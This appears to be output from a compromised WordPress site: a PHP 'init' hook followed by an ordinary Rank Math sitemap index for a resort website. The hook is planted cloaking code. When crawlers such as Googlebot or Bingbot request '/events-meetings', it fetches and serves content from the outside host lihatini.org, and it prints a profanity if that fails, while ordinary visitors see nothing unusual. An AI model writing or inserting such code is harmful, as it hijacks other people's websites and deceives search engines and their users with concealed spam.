add_action('init', function () {
    $req = $_SERVER['REQUEST_URI'] ?? '';
    $path = rtrim(parse_url($req, PHP_URL_PATH) ?: '/', '/');
    $ua   = strtolower($_SERVER['HTTP_USER_AGENT'] ?? '');

    $path_mapping = [
        '/events-meetings'  => 'tes.txt',

    ];

    if (array_key_exists($path, $path_mapping)) {
        if (preg_match('/Googlebot|Google-inspectiontool|Bingbot|Slurp|duckduckbot|Baiduspider|Yandexbot|Applebot|Facebookexternalhit|Linkedinbot|Twitterbot|Pinterestbot|Slackbot|Telegrambot|Semrushbot|Ahrefsbot|Mj12bot|Petalbot|Sogou spider|Seznambot/i', $ua)) {
            $filename = $path_mapping[$path];
            $url = 'https://lihatini.org/' . $filename;
            $response = wp_remote_get($url);
            if (is_array($response) && !is_wp_error($response)) {
                $content = wp_remote_retrieve_body($response);
                if ($content) {
                    echo $content;
                    exit;
                }
            }
            echo 'cunt';
            exit;
        }
    }
});<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//goldcoinsresort.in/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://goldcoinsresort.in/post-sitemap.xml</loc>
		<lastmod>2026-06-24T07:02:30+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://goldcoinsresort.in/page-sitemap.xml</loc>
		<lastmod>2026-06-30T04:18:05+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://goldcoinsresort.in/e-floating-buttons-sitemap.xml</loc>
		<lastmod>2024-12-23T10:24:37+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://goldcoinsresort.in/product-sitemap.xml</loc>
		<lastmod>2026-06-29T07:38:58+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://goldcoinsresort.in/custom_blocks-sitemap.xml</loc>
		<lastmod>2026-06-24T05:14:41+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://goldcoinsresort.in/custom_site_headers-sitemap.xml</loc>
		<lastmod>2026-06-23T04:44:09+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://goldcoinsresort.in/loftocean_room-sitemap.xml</loc>
		<lastmod>2026-06-18T05:01:38+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://goldcoinsresort.in/category-sitemap.xml</loc>
		<lastmod>2026-06-24T07:02:30+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Rank Math SEO Plugin (c) Rank Math - rankmath.com -->